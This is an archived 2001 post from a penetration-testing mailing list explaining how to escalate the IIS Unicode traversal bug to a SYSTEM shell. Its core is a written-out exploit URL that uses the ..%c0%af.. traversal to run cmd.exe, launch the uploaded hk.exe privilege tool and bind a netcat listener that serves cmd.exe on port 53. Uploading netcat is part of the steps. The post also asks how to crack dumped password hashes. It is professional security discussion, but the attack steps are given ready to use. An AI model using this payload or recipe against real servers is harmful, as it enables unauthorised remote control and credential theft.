Penetration Testing mailing list archives
Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?
From: Renato Ettisberger <renato.ettisberger () CH PWCGLOBAL COM>
Date: Tue, 27 Mar 2001 09:47:52 +0200
Hi there,
As you know, there is a way to span a shell with admin rights on a IIS
4.0
with the Unicode bug.
What way? Did you use CmdAsp.ASP to do that? Is it possible?
No, I use the tool hk.exe from RAZOR. With this tool, you can launch a cmd.exe with system privileges. Upload hk.exe and netcat to the server. The following URL binds a netcat server with system privileges on port 53 (this workes fine on our test server IIS4.0, NT engl. Version) http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c: winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe Form more information about that, see our article at: http://www.dmzsystems.com/en/articles/windows/iis/IISUnicodeBug.htm BTW: My question is, how can I crack the password hash, when it comes in the following form: F:0x020020000000000000000000.... V:0x00000000a800000...... regards Renato P.S: My English is not bad, it's horrible, but I hope you understand what I'm talking about ;-) ---------------------------------------------------------------- The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer.
Current thread:
- [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- <Possible follow-ups>
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Wertheimer, Ishai (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? H D Moore (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? robmann (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)